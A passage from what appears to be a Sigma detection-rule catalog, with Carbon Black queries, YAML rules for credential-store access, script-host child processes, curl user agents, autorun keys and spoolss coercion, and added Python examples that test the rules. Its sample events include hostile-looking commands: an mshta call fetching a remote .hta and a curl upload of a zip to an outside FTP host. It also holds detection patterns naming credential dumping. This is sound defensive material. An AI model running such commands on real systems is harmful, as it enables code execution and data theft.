        Image|endswith: '\safari.exe'
    filter_optional_seamonkey:
        Image|endswith: '\seamonkey.exe'
    filter_optional_vivaldi:
        Image|endswith: '\vivaldi.exe'
    filter_optional_whale:
        Image|endswith: '\whale.exe'
    filter_optional_snipping_tool:
        Image|startswith: 'C:\Program Files\WindowsApps\Microsoft.ScreenSketch_'
        Image|endswith: '\SnippingTool\SnippingTool.exe'
        TargetFilename|startswith: 'C:\Users\'
        TargetFilename|contains|all:
            - '\AppData\Local\Packages\Microsoft.ScreenSketch_'
            - '\TempState\Screenshot '
        TargetFilename|endswith: '.png:Zone.Identifier'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Other legitimate browsers not currently included in the filter (please add them)
    - Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)
level: medium
medium Moderate Medium FP
Creation of WerFault.exe/Wer.dll in Unusual Folder
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
status test author frack113 ATT&CK sub-technique id 28a452f3-786c-4fd8-b8f2-bddbe9d616d1
carbon_black query
(TargetFilename:\\WerFault.exe OR TargetFilename:\\wer.dll) (-((TargetFilename:C\:\\Windows\\SoftwareDistribution\\* OR TargetFilename:C\:\\Windows\\System32\\* OR TargetFilename:C\:\\Windows\\SysWOW64\\* OR TargetFilename:C\:\\Windows\\WinSxS\\* OR TargetFilename:C\:\\Windows\\UUS\\*) OR Image:\\wuaucltcore.exe))
view Sigma YAML
title: Creation of WerFault.exe/Wer.dll in Unusual Folder
id: 28a452f3-786c-4fd8-b8f2-bddbe9d616d1
status: test
description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
references:
    - https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/
author: frack113
date: 2022-05-09
modified: 2026-05-18
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\WerFault.exe'
            - '\wer.dll'
    filter_main_known_locations:
        TargetFilename|startswith:
            - 'C:\Windows\SoftwareDistribution\'
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\WinSxS\'
            - 'C:\Windows\UUS\' # covers both C:\Windows\UUS\arm64\ and C:\Windows\UUS\packages\
    filter_main_process:
        Image|endswith: '\wuaucltcore.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Creation of a Diagcab
Detects the creation of a diagcab file, which could be caused by a legitimate installer or be a sign of exploitation (review the filename and its location)
status test author frack113 ATT&CK tactic-only id 3d0ed417-3d94-4963-a562-4a92c940656a
carbon_black query
TargetFilename:.diagcab
view Sigma YAML
title: Creation of a Diagcab
id: 3d0ed417-3d94-4963-a562-4a92c940656a
status: test
description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
references:
    - https://threadreaderapp.com/thread/1533879688141086720.html
author: frack113
date: 2022-06-08
tags:
    - attack.resource-development
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith: '.diagcab'
    condition: selection
falsepositives:
    - Legitimate microsoft diagcab
level: medium
medium Strong Medium FP
CredUI.DLL Loaded By Uncommon Process
Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) ATT&CK sub-technique id 9ae01559-cf7e-4f8e-8e14-4c290a1b4784
carbon_black query
((ImageLoaded:\\credui.dll OR ImageLoaded:\\wincredui.dll) OR (OriginalFileName:credui.dll OR OriginalFileName:wincredui.dll)) (-((Image:C\:\\Program\ Files\ \(x86\)\\* OR Image:C\:\\Program\ Files\\* OR Image:C\:\\Windows\\System32\\* OR Image:C\:\\Windows\\SysWOW64\\* OR Image:C\:\\Windows\\SystemApps\\*) OR (Image:C\:\\Windows\\explorer.exe OR Image:C\:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe OR Image:C\:\\Windows\\regedit.exe))) (-(Image:\\opera_autoupdate.exe OR (Image:\\procexp64.exe OR Image:\\procexp.exe) OR (Image:C\:\\Users\\* Image:\\AppData\\Local\\Microsoft\\Teams\\* Image:\\Teams.exe) OR (Image:C\:\\Users\\* Image:\\AppData\\Local\\Microsoft\\OneDrive\\*)))
view Sigma YAML
title: CredUI.DLL Loaded By Uncommon Process
id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784
status: test
description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
references:
    - https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password
    - https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa
    - https://github.com/S12cybersecurity/RDPCredentialStealer
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2025-12-09
tags:
    - attack.credential-access
    - attack.collection
    - attack.t1056.002
logsource:
    category: image_load
    product: windows
detection:
    selection:
        - ImageLoaded|endswith:
              - '\credui.dll'
              - '\wincredui.dll'
        - OriginalFileName:
              - 'credui.dll'
              - 'wincredui.dll'
    filter_main_generic:
        Image|startswith:
            - 'C:\Program Files (x86)\'
            - 'C:\Program Files\'
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\SystemApps\'
    filter_main_full:
        Image:
            - 'C:\Windows\explorer.exe'
            - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe'
            - 'C:\Windows\regedit.exe' # This FP is triggered for example when choosing the "Connect Network Registry" from the menu
    filter_optional_opera:
        Image|endswith: '\opera_autoupdate.exe'
    filter_optional_process_explorer:
        Image|endswith:
            - '\procexp64.exe'
            - '\procexp.exe'
    filter_optional_teams:
        Image|startswith: 'C:\Users\'
        Image|contains: '\AppData\Local\Microsoft\Teams\'
        Image|endswith: '\Teams.exe'
    filter_optional_onedrive:
        Image|startswith: 'C:\Users\'
        Image|contains: '\AppData\Local\Microsoft\OneDrive\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Other legitimate processes loading those DLLs in your environment.
level: medium
medium Moderate High FP
Credential Manager Access By Uncommon Applications
Detects suspicious processes, identified by name and location, that access the Windows Credential Manager and Vault files, which can be a sign of credential theft. An example is the use of the mimikatz "dpapi::cred" function.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 407aecb1-e762-4acf-8c7b-d087bcff3bb6
carbon_black query
(FileName:\\AppData\\Local\\Microsoft\\Credentials\\* OR FileName:\\AppData\\Roaming\\Microsoft\\Credentials\\* OR FileName:\\AppData\\Local\\Microsoft\\Vault\\* OR FileName:\\ProgramData\\Microsoft\\Vault\\*) (-(Image:C\:\\Program\ Files\\* OR Image:C\:\\Program\ Files\ \(x86\)\\* OR Image:C\:\\Windows\\system32\\* OR Image:C\:\\Windows\\SysWOW64\\*))
view Sigma YAML
title: Credential Manager Access By Uncommon Applications
id: 407aecb1-e762-4acf-8c7b-d087bcff3bb6
status: test
description: |
    Detects suspicious processes, identified by name and location, that access the Windows Credential Manager and Vault files, which can be a sign of credential theft.
    An example is the use of the mimikatz "dpapi::cred" function.
references:
    - https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-11
modified: 2024-07-29
tags:
    - attack.t1003
    - attack.credential-access
logsource:
    category: file_access
    product: windows
    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'
detection:
    selection:
        FileName|contains:
            - '\AppData\Local\Microsoft\Credentials\'
            - '\AppData\Roaming\Microsoft\Credentials\'
            - '\AppData\Local\Microsoft\Vault\'
            - '\ProgramData\Microsoft\Vault\'
    filter_system_folders:
        Image|startswith:
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
            - 'C:\Windows\system32\'
            - 'C:\Windows\SysWOW64\'
    condition: selection and not 1 of filter_*
falsepositives:
    - Legitimate software installed by the users for example in the "AppData" directory may access these files (for any reason).
# Increase level after false positives filters are good enough
level: medium
medium Strong Medium FP
Credentials from Password Stores - Keychain
Detects attempts to dump passwords or certificates from the macOS Keychain, for example via the "security" command-line tool.
status test author Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems) ATT&CK sub-technique id b120b587-a4c2-4b94-875d-99c9807d6955
carbon_black query
(Image:\/usr\/bin\/security (CommandLine:find\-certificate* OR CommandLine:\ export\ *)) OR (CommandLine:\ dump\-keychain\ * OR CommandLine:\ login\-keychain\ *)
view Sigma YAML
title: Credentials from Password Stores - Keychain
id: b120b587-a4c2-4b94-875d-99c9807d6955
status: test
description: Detects attempts to dump passwords or certificates from the macOS Keychain, for example via the "security" command-line tool.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md
    - https://gist.github.com/Capybara/6228955
author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
date: 2020-10-19
modified: 2021-11-27
tags:
    - attack.credential-access
    - attack.t1555.001
logsource:
    category: process_creation
    product: macos
detection:
    selection1:
        Image: '/usr/bin/security'
        CommandLine|contains:
            - 'find-certificate'
            - ' export '
    selection2:
        CommandLine|contains:
            - ' dump-keychain '
            - ' login-keychain '
    condition: 1 of selection*
falsepositives:
    - Legitimate administration activities
level: medium
medium Strong Medium FP
Cscript/Wscript Potentially Suspicious Child Process
Detects potentially suspicious child processes of Wscript/Cscript, such as rundll32 with uncommon exports, or a shell (cmd/PowerShell) spawning rundll32, regsvr32 or msiexec. Malware families such as Pikabot and Qakbot, among many others, have been seen using these techniques.
status test author Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86') ATT&CK tactic-only id b6676963-0353-4f88-90f5-36c20d443c6a
carbon_black query
(ParentImage:\\wscript.exe OR ParentImage:\\cscript.exe) (Image:\\rundll32.exe OR ((Image:\\cmd.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe) ((CommandLine:mshta* CommandLine:http*) OR (CommandLine:rundll32* OR CommandLine:regsvr32* OR CommandLine:msiexec*)))) (-(Image:\\rundll32.exe (CommandLine:UpdatePerUserSystemParameters* OR CommandLine:PrintUIEntry* OR CommandLine:ClearMyTracksByProcess*)))
view Sigma YAML
title: Cscript/Wscript Potentially Suspicious Child Process
id: b6676963-0353-4f88-90f5-36c20d443c6a
status: test
description: |
    Detects potentially suspicious child processes of Wscript/Cscript, such as rundll32 with uncommon exports, or a shell (cmd/PowerShell) spawning rundll32, regsvr32 or msiexec.
    Malware families such as Pikabot and Qakbot, among many others, have been seen using these techniques.
references:
    - Internal Research
    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_30.10.2023.txt
    - https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt
author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
date: 2023-05-15
modified: 2024-01-02
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
    selection_cli_script_main:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
    # Note: Add other combinations that are suspicious
    selection_cli_script_option_mshta:
        CommandLine|contains|all:
            - 'mshta'
            - 'http'
    selection_cli_script_option_other:
        CommandLine|contains:
            - 'rundll32'
            - 'regsvr32'
            - 'msiexec'
    selection_cli_standalone:
        Image|endswith: '\rundll32.exe'
    filter_main_rundll32_known_exports:
        Image|endswith: '\rundll32.exe'
        CommandLine|contains:
            - 'UpdatePerUserSystemParameters'
            - 'PrintUIEntry'
            - 'ClearMyTracksByProcess'
    condition: selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*
falsepositives:
    - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.
level: medium
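The condition line of this rule is the most nested one in this part of the corpus: the parent must be a script host, the child must either be rundll32.exe on its own or a shell whose command line carries one of the option patterns, and the known-benign rundll32 exports are then subtracted. The Python below, an added example rather than code from the page or the Sigma project, evaluates exactly that condition over constructed process-creation events (field names follow the Sigma process_creation taxonomy; the paths, the IP address and the DLL names are made up) so that each branch and the filter can be seen firing or staying quiet.

```python
SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")
KNOWN_RUNDLL32_EXPORTS = ("updateperusersystemparameters", "printuientry", "clearmytracksbyprocess")


def rule_script_host_suspicious_child(event):
    """Sigma b6676963. Condition, as in the YAML:
    selection_parent and (selection_cli_standalone or
        (selection_cli_script_main and 1 of selection_cli_script_option_*))
    and not 1 of filter_main_*
    Sigma string matching is case-insensitive by default, hence the lower-casing.
    """
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()

    selection_parent = parent.endswith(SCRIPT_HOSTS)
    standalone = image.endswith("\\rundll32.exe")                  # rundll32 child, any arguments
    script_main = image.endswith(SHELLS)                           # shell child ...
    option_mshta = "mshta" in cmd and "http" in cmd                # ... fetching a remote .hta
    option_other = any(t in cmd for t in ("rundll32", "regsvr32", "msiexec"))  # ... or chaining LOLBins
    filter_known_exports = standalone and any(x in cmd for x in KNOWN_RUNDLL32_EXPORTS)

    return (selection_parent
            and (standalone or (script_main and (option_mshta or option_other)))
            and not filter_known_exports)


# Constructed process-creation events (hypothetical paths, DLL names and a TEST-NET IP).
SAMPLE_EVENTS = [
    # 1. script host launching rundll32 on a DLL dropped in a user-writable path -> alert
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\update.dll,Start"},
    # 2. same parent/child but a known benign export -> filtered
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe user32.dll,UpdatePerUserSystemParameters"},
    # 3. cscript -> cmd.exe chaining regsvr32 on an .ocx -> alert
    {"ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c regsvr32 /s C:\ProgramData\a.ocx"},
    # 4. wscript -> powershell invoking mshta with a remote URL -> alert
    {"ParentImage": r"C:\Windows\SysWOW64\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "mshta http://203.0.113.10/a.hta"'},
    # 5. mshta with a local .hta only: the 'http' half of the contains|all is missing -> no alert
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "mshta C:\Temp\page.hta"'},
    # 6. script host running a harmless cmd.exe -> no alert
    {"ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo logon script done"},
    # 7. rundll32 from a non-script parent -> outside the rule
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\update.dll,Start"},
]


def evaluate_samples():
    """One verdict per sample event, in order."""
    return [rule_script_host_suspicious_child(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate_samples()):
        print(f"{event['ParentImage'].rsplit(chr(92), 1)[-1]:<14} -> {event['CommandLine'][:55]:<55} alert={hit}")
```

Sample 5 is the one to keep in mind when tuning: the mshta branch needs both `mshta` and `http` on the same command line, so an .hta staged locally by an earlier download is intentionally outside this rule and has to be caught elsewhere.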
medium Strong Medium FP
Curl Web Request With Potential Custom User-Agent
Detects execution of "curl.exe" with a potentially custom "User-Agent" header. Attackers can use this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 85de1f22-d189-44e4-8239-dc276b45379b
carbon_black query
(Image:\\curl.exe OR OriginalFileName:curl.exe) (CommandLine:\\s-H\\s OR CommandLine:\-\-header*) CommandLine:User\-Agent\:*
view Sigma YAML
title: Curl Web Request With Potential Custom User-Agent
id: 85de1f22-d189-44e4-8239-dc276b45379b
status: test
description: Detects execution of "curl.exe" with a potentially custom "User-Agent" header. Attackers can use this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings.
references:
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-27
modified: 2025-12-11
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    # Example: This command line would trigger the rule
    # curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com
    selection_img:
        - Image|endswith: '\curl.exe'
        - OriginalFileName: 'curl.exe'
    selection_header_flag_1:
        CommandLine|re: '\s-H\s' # Must be Regex as the flag needs to be case sensitive
    selection_header_flag_2:
        CommandLine|contains: '--header'
    selection_user_agent:
        CommandLine|contains: 'User-Agent:'
    condition: selection_img and 1 of selection_header_* and selection_user_agent
falsepositives:
    - Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
medium Moderate High FP
Curl.EXE Execution With Custom UserAgent
Detects execution of curl.exe with a custom User-Agent option (-A / --user-agent).
status test author frack113 ATT&CK sub-technique id 3286d37a-00fd-41c2-a624-a672dcd34e60
carbon_black query
(Image:\\curl.exe OR Product:The\ curl\ executable) (CommandLine:\ \-A\ * OR CommandLine:\ \-\-user\-agent\ *)
view Sigma YAML
title: Curl.EXE Execution With Custom UserAgent
id: 3286d37a-00fd-41c2-a624-a672dcd34e60
status: test
description: Detects execution of curl.exe with a custom User-Agent option (-A / --user-agent).
references:
    - https://curl.se/docs/manpage.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd
author: frack113
date: 2022-01-23
modified: 2023-02-21
tags:
    - attack.command-and-control
    - attack.t1071.001
    - detection.threat-hunting
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        - Image|endswith: '\curl.exe'
        - Product: 'The curl executable'
    selection_opt:
        CommandLine|contains:
            - ' -A '
            - ' --user-agent '
    condition: all of selection_*
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: medium
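The two curl rules above differ in one detail worth testing before deployment: the first matches the header flag with a case-sensitive regex (`\s-H\s`), because Sigma's plain string modifiers are case-insensitive and curl's lower-case `-h` is the help flag, while the second relies on a case-insensitive `contains` for ` -A `. The following Python re-implementation of both rules, run over constructed process-creation events, is an added example and not code from the page or from the Sigma project; the event field names follow the Sigma process_creation taxonomy, and the command lines, hosts and paths are made up.

```python
import re

# Sigma string matching is case-insensitive by default, so the plain 'contains'
# values are compared on lower-cased text. The 're' modifier is case-sensitive,
# which is what lets the first rule tell curl's -H (custom header) from -h (help).
HEADER_FLAG_RE = re.compile(r"\s-H\s")


def is_curl(event):
    image = event.get("Image", "").lower()
    return image.endswith("\\curl.exe") or event.get("OriginalFileName", "").lower() == "curl.exe"


def rule_curl_custom_ua_header(event):
    """Sigma 85de1f22: curl.exe passing a User-Agent through -H / --header."""
    if not is_curl(event):
        return False
    cmd = event.get("CommandLine", "")
    header_flag = HEADER_FLAG_RE.search(cmd) is not None or "--header" in cmd.lower()
    return header_flag and "user-agent:" in cmd.lower()


def rule_curl_custom_ua_option(event):
    """Sigma 3286d37a: curl.exe (by image name or Product) using -A / --user-agent."""
    image = event.get("Image", "").lower()
    if not (image.endswith("\\curl.exe") or event.get("Product") == "The curl executable"):
        return False
    cmd = event.get("CommandLine", "").lower()
    return " -a " in cmd or " --user-agent " in cmd


RULES = {
    "Curl Web Request With Potential Custom User-Agent": rule_curl_custom_ua_header,
    "Curl.EXE Execution With Custom UserAgent": rule_curl_custom_ua_option,
}

# Constructed process-creation events (made-up hosts, paths and tokens).
CURL = {"OriginalFileName": "curl.exe", "Product": "The curl executable"}
SAMPLE_EVENTS = [
    dict(CURL, Image=r"C:\Windows\System32\curl.exe",
         CommandLine='curl.exe -H "User-Agent: EvilAgent" http://malicious.example.com'),
    dict(CURL, Image=r"C:\Windows\System32\curl.exe",
         CommandLine='curl.exe --header "user-agent: Mozilla/5.0" -o p.bin https://cdn.example.net/f'),
    dict(CURL, Image=r"C:\Windows\System32\curl.exe",
         CommandLine="curl.exe -h all"),                       # lower-case -h is help, not a header
    dict(CURL, Image=r"C:\Users\jdoe\Downloads\curl.exe",
         CommandLine='curl.exe -A "Mozilla/5.0 (Windows NT 10.0)" -T r.zip ftp://files.example.net/'),
    dict(CURL, Image=r"C:\Windows\System32\curl.exe",
         CommandLine='curl.exe -H "Authorization: Bearer 1234" https://api.example.com/v1/me'),
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "Product": "Microsoft Windows Operating System",
     "CommandLine": "cmd.exe /c echo -H User-Agent: test"},
]


def evaluate(events):
    """Per event, the titles of the rules that fire (empty list = no alert)."""
    return [[title for title, rule in RULES.items() if rule(e)] for e in events]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{event['CommandLine'][:60]:<60} -> {hits or 'no alert'}")
```

Because ` -A ` is matched case-insensitively, the second rule also fires on curl's lower-case `-a` (`--append`, used with uploads); if that shows up in your baseline, converting that selection to a case-sensitive `re` modifier, as the first rule already does for `-H`, is the cheapest tuning step.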
medium Strong Medium FP
CurrentControlSet Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
status test author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) ATT&CK sub-technique id f674e36a-4b91-431e-8aef-f8a96c2aca35
carbon_black query
(TargetObject:\\SYSTEM\\CurrentControlSet\\Control* (TargetObject:\\Terminal\ Server\\WinStations\\RDP\-Tcp\\InitialProgram* OR TargetObject:\\Terminal\ Server\\Wds\\rdpwd\\StartupPrograms* OR TargetObject:\\SecurityProviders\\SecurityProviders* OR TargetObject:\\SafeBoot\\AlternateShell* OR TargetObject:\\Print\\Providers* OR TargetObject:\\Print\\Monitors* OR TargetObject:\\NetworkProvider\\Order* OR TargetObject:\\Lsa\\Notification\ Packages* OR TargetObject:\\Lsa\\Authentication\ Packages* OR TargetObject:\\BootVerificationProgram\\ImagePath*)) (-(Details:\(Empty\) OR (Image:C\:\\Windows\\System32\\spoolsv.exe TargetObject:\\Print\\Monitors\\CutePDF\ Writer\ Monitor* (Details:cpwmon64_v40.dll OR Details:CutePDF\ Writer)) OR (Image:C\:\\Windows\\System32\\spoolsv.exe TargetObject:Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_* (User:AUTHORI* OR User:AUTORI*)) OR (Image:C\:\\Windows\\System32\\poqexec.exe TargetObject:\\NetworkProvider\\Order\\ProviderOrder) OR (Image:C\:\\Windows\\System32\\spoolsv.exe TargetObject:\\Print\\Monitors\\MONVNC\\Driver Details:VNCpm.dll)))
view Sigma YAML
title: CurrentControlSet Autorun Keys Modification
id: f674e36a-4b91-431e-8aef-f8a96c2aca35
related:
    - id: 17f878b8-9968-4578-b814-c4217fc5768c
      type: obsolete
status: test
description: Detects modification of autostart extensibility point (ASEP) in registry.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
date: 2019-10-25
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    category: registry_set
    product: windows
detection:
    system_control_base:
        TargetObject|contains: '\SYSTEM\CurrentControlSet\Control'
    system_control_keys:
        TargetObject|contains:
            - '\Terminal Server\WinStations\RDP-Tcp\InitialProgram'
            - '\Terminal Server\Wds\rdpwd\StartupPrograms'
            - '\SecurityProviders\SecurityProviders'
            - '\SafeBoot\AlternateShell'
            - '\Print\Providers'
            - '\Print\Monitors'
            - '\NetworkProvider\Order'
            - '\Lsa\Notification Packages'
            - '\Lsa\Authentication Packages'
            - '\BootVerificationProgram\ImagePath'
    filter_empty:
        Details: '(Empty)'
    filter_cutepdf:
        Image: 'C:\Windows\System32\spoolsv.exe'
        TargetObject|contains: '\Print\Monitors\CutePDF Writer Monitor'
        Details:
            - 'cpwmon64_v40.dll'
            - 'CutePDF Writer'
    filter_onenote:
        Image: C:\Windows\System32\spoolsv.exe
        TargetObject|contains: 'Print\Monitors\Appmon\Ports\Microsoft.Office.OneNote_'
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    filter_poqexec:
        Image: 'C:\Windows\System32\poqexec.exe'
        TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder'
    filter_realvnc:
        Image: 'C:\Windows\System32\spoolsv.exe'
        TargetObject|endswith: '\Print\Monitors\MONVNC\Driver'
        Details: 'VNCpm.dll'
    condition: all of system_control_* and not 1 of filter_*
falsepositives:
    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
    - Legitimate administrator sets up autorun keys for legitimate reason
level: medium
medium Strong Medium FP
DCERPC SMB Spoolss Named Pipe
Detects access to the spoolss named pipe over SMB (Security event 5145 on the IPC$ share). Remote calls over this pipe can be used to coerce any machine that has the Print Spooler service enabled into authenticating, via NTLM, to an attacker-controlled host.
status test author OTR (Open Threat Research) ATT&CK sub-technique id 214e8f95-100a-4e04-bb31-ef6cba8ce07e
carbon_black query
EventID:5145 ShareName:\\\\\*\\IPC$ RelativeTargetName:spoolss
view Sigma YAML
title: DCERPC SMB Spoolss Named Pipe
id: 214e8f95-100a-4e04-bb31-ef6cba8ce07e
status: test
description: Detects access to the spoolss named pipe over SMB (Security event 5145 on the IPC$ share). Remote calls over this pipe can be used to coerce any machine that has the Print Spooler service enabled into authenticating, via NTLM, to an attacker-controlled host.
references:
    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
    - https://dirkjanm.io/a-different-way-of-abusing-zerologon/
    - https://twitter.com/_dirkjan/status/1309214379003588608
author: OTR (Open Threat Research)
date: 2018-11-28
modified: 2022-08-11
tags:
    - attack.lateral-movement
    - attack.t1021.002
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5145
        ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$
        RelativeTargetName: spoolss
    condition: selection
falsepositives:
    - 'Domain Controllers acting as printer servers too? :)'
level: medium
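The `ShareName` value in this rule trips people up: in Sigma, `\\` is an escaped backslash and `\*` an escaped (literal) asterisk, so `'\\\\\*\\IPC$'` is the literal string `\\*\IPC$` that Windows writes into event 5145 for named-pipe access, not a wildcard. The Python below is an added example, not code from the page or the Sigma project: it decodes Sigma string escapes into a regex, flattens a constructed 5145 message body (synthetic, laid out like Event Viewer's rendering, with made-up SIDs, names and addresses) into the field names the rule uses, and applies the rule.

```python
import re


def sigma_value_to_regex(value):
    r"""Compile a plain Sigma string value into a case-insensitive full-match regex.

    Sigma escaping: '\\' is a literal backslash, '\*' a literal asterisk and '\?' a
    literal question mark; a bare '*' matches any run of characters and a bare '?'
    one character. A backslash before any other character is a literal backslash.
    """
    parts, i = [], 0
    while i < len(value):
        ch = value[i]
        if ch == "\\" and i + 1 < len(value) and value[i + 1] in "\\*?":
            parts.append(re.escape(value[i + 1]))
            i += 2
        elif ch == "*":
            parts.append(".*")
            i += 1
        elif ch == "?":
            parts.append(".")
            i += 1
        else:
            parts.append(re.escape(ch))
            i += 1
    return re.compile("".join(parts), re.IGNORECASE | re.DOTALL)


# Message-body labels of event 5145 mapped to the field names Sigma's 'security'
# service uses (the names from the event's XML EventData).
FIELD_MAP = {
    "Account Name": "SubjectUserName",
    "Source Address": "IpAddress",
    "Share Name": "ShareName",
    "Share Path": "SharePath",
    "Relative Target Name": "RelativeTargetName",
    "Access Mask": "AccessMask",
}


def parse_security_message(event_id, message):
    """Flatten the rendered 'Label: value' lines of a Security event into a dict."""
    fields = {"EventID": str(event_id)}
    for line in message.splitlines():
        m = re.match(r"^\s*([A-Za-z][A-Za-z ]*?):\s*(.*?)\s*$", line)
        if m and m.group(1) in FIELD_MAP:
            fields[FIELD_MAP[m.group(1)]] = m.group(2)
    return fields


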